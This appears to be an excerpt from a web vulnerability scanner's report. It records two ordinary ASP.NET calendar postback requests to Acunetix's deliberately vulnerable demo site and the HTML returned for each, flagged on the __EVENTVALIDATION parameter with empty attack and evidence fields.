Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8620&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAsWiil9sIZGRk8RnbuKc5Ta2Vyg1pTuZGArxIbRo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKkotzsBQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb1SkSizFkFLYNXfKEb2XUH7CIE6w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:57 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAsWiil9sIZGRk8RnbuKc5Ta2Vyg1pTuZGArxIbRo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKkotzsBQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb1SkSizFkFLYNXfKEb2XUH7CIE6w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:White" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8167&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAkFuqM9oIZGRk%2BvbHxxCTVD3oT%2BmUuHwVCIo%2FdSI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKkwubvBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esP7mEAgmRqKcf1LEUvfwK9HQsNVi8%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:04 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAkFuqM9oIZGRk+vbHxxCTVD3oT+mUuHwVCIo/dSI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKkwubvBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esP7mEAgmRqKcf1LEUvfwK9HQsNVi8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:White" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
